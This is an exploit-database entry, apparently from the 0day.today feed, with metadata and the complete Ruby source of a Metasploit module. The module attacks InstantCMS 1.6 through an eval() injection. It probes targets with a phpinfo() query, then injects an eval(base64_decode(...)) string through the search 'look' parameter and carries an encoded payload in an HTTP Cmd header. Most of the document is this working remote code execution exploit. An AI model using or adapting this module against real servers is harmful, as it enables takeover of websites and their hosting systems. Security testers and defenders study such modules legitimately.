Description
This Metasploit module exploits an arbitrary php command execution vulnerability, because of a dangerous use of eval(), in InstantCMS versions 1.6.
{"id": "1337DAY-ID-20966", "type": "zdt", "bulletinFamily": "exploit", "title": "InstantCMS 1.6 Remote PHP Code Execution Vulnerability", "description": "This Metasploit module exploits an arbitrary php command execution vulnerability, because of a dangerous use of eval(), in InstantCMS versions 1.6.", "published": "2013-07-03T00:00:00", "modified": "2013-07-03T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/20966", "reporter": "AkaStep", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-02-06T23:18:28", "viewCount": 22, "enchantments": {"score": {"value": 1.4, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 1.4}, "sourceHref": "https://0day.today/exploit/20966", "sourceData": "require 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'InstantCMS 1.6 Remote PHP Code Execution',\r\n 'Description' => %q{\r\n This module exploits an arbitrary php command execution vulnerability, because of a\r\n dangerous use of eval(), in InstantCMS versions 1.6.\r\n },\r\n 'Author' =>\r\n [\r\n 'AkaStep', # Vulnerability discovery and PoC\r\n 'Ricardo Jorge Borges de Almeida <ricardojba1[at]gmail.com>', # Metasploit module\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'BID', '60816' ],\r\n [ 'URL', 'http://packetstormsecurity.com/files/122176/InstantCMS-1.6-Code-Execution.html' ]\r\n ],\r\n 'Privileged' => false,\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [ 'InstantCMS 1.6', { } ],\r\n ],\r\n 'DisclosureDate' => 'Jun 26 2013',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, \"The URI path of the InstantCMS page\", \"/\"])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.to_s),\r\n 'vars_get' =>\r\n {\r\n 'view' => 'search',\r\n 'query' => '${echo phpinfo()}'\r\n }\r\n })\r\n\r\n if res\r\n if res.body.match(/Build Date/)\r\n return Exploit::CheckCode::Vulnerable\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n else\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n def exploit\r\n\r\n print_status(\"Executing payload...\")\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.to_s),\r\n 'vars_get' =>\r\n {\r\n 'view' => 'search',\r\n 'query' => rand_text_alpha(3 + rand(3)),\r\n 'look' => \"#{rand_text_alpha(3 + rand(3))}\\\",\\\"\\\"); eval(base64_decode($_SERVER[HTTP_CMD]));//\"\r\n },\r\n 'headers' => {\r\n 'Cmd' => Rex::Text.encode_base64(payload.encoded)\r\n }\r\n })\r\n\r\n end\r\nend\n\n# 0day.today [2018-02-06] #", "_state": {"dependencies": 1647004802, "score": 1659766679, "epss": 1678811959}}
{}
InstantCMS 1.6 Remote PHP Code Execution Vulnerability